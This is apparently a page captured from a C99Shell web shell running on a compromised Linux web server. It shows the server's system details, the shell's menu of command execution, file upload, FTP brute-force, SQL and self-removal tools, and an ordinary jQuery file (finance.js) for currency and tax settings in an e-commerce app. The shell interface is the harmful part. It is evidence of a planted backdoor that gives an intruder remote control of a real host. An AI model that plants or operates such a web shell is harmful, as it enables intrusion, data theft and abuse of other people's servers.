!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/public/dist/js/custom/   drwxr-xr-x
Free 26.05 GB of 117.98 GB (22.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     finance.js (4.1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"use strict";
$(document).on( 'init.dt', function () {
    $(".dataTables_length").remove();
    $('#dataTableBuilder').removeAttr('style');
});
// currency settings js
if ($('.main-body .page-wrapper').find('#currency-settings-container').length) {
    dataTable('#dataTableBuilder', 3);
    $('.js-example-basic-single-1').select2();

    $('.js-example-basic-single-2').select2();

    $('#add-currency').on('hidden.bs.modal', function() {
        $('input[name=name]').removeClass('error');
        $('input[name=symbol]').removeClass('error');
        $('input[name=exchange_rate]').removeClass('error');
    });

    $("#edit-unit").on("show.bs.modal", function () {
        $("#curr_name, #curr_symbol, #exchange_rate").removeClass("error");
        $("#curr_name-error, #curr_symbol-error, #exchange_rate-error").hide();
    });

    $(document).on('click', '.edit_currency', function () {
        var id = $(this).attr("id");
        $.ajax({
            url: SITE_URL + "/currencies/edit",
            data: {
                id: id,
                "_token": token
            },
            type: 'POST',
            dataType: 'JSON',
            success: function (data) {
                $('#curr_name').val(data.name);
                $('#curr_symbol').val(data.symbol);
                $('#curr_id').val(data.id);
                var exchangeRateFormate = getDecimalNumberFormat(data.exchange_rate);
                $('#exchange_rate').val(exchangeRateFormate);
                $('#exchange_from').val(data.exchange_from).trigger('change');

                $('#edit-unit').modal();
            }
        });
    });

    $('#add-currency').on('hidden.bs.modal', function (e) {
        $(this).find('input[name = name]').val('');
        $(this).find('input[name = symbol]').val('');
        $(this).find('input[name = exchange_rate]').val('');
    });

    $('.btn-group').hide();
    confirmDelete('#confirmDelete', '#confirmDeleteSubmitBtn', '#confirmDeleteLabel', '#delete-currency-');
    $("#dataTableBuilder").addClass('taxes');
    $('#add_exchange_from').on('change', function() {
        if ($(this).find('option:selected').text() == "api") {
            $('#note').show();
        } else {
            $('#note').hide();
        }
    })

    $('#exchange_from').on('change', function() {
        if ($(this).find('option:selected').text() == "api") {
            $('#note_edit').show();
        } else {
            $('#note_edit').hide();
        }
    })

    $("#currency-converter").on("show.bs.modal", function () {
        $('#add-unit').modal('hide');
        $('#edit-unit').modal('hide');
    });
}


// Tax js
if ($('.main-body .page-wrapper').find('#tax-settings-container').length) {
    dataTable('#dataTableBuilder', 3);
    $('.select2').select2();
    $('#add-tax').on('hidden.bs.modal', function() {
        $(".has-validation-error label").remove();
    });

    $("#edit-tax").on("show.bs.modal", function () {
        $(".has-validation-error label").remove();
    });
    $(document).on('click', '.edit_currency', function () {
        var id = $(this).attr("id");
        $.ajax({
            url: SITE_URL + "/taxes/edit",
            data: {
                id: id,
                "_token": token
            },
            type: 'POST',
            dataType: 'JSON',
            success: function (data) {
                $('#name').val(data.name);
                $('#tax_id').val(data.id);
                var tax_rate = getDecimalNumberFormat(data.tax_rate);
                $('#tax_rate').val(tax_rate);
                $('#is_default').val(data.is_default).trigger('change');

                $('#edit-tax').modal();
            }
        });
    });

    $('#add-tax').on('hidden.bs.modal', function (e) {
        $(this).find('input[name = name]').val('');
        $(this).find('input[name = tax_rate]').val('');
        $(this).find('input[name = is_default]').val('');
    });

    $('.btn-group').hide();
    confirmDelete('#confirmDelete', '#confirmDeleteSubmitBtn', '#confirmDeleteLabel', '#delete-currency-');
}



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--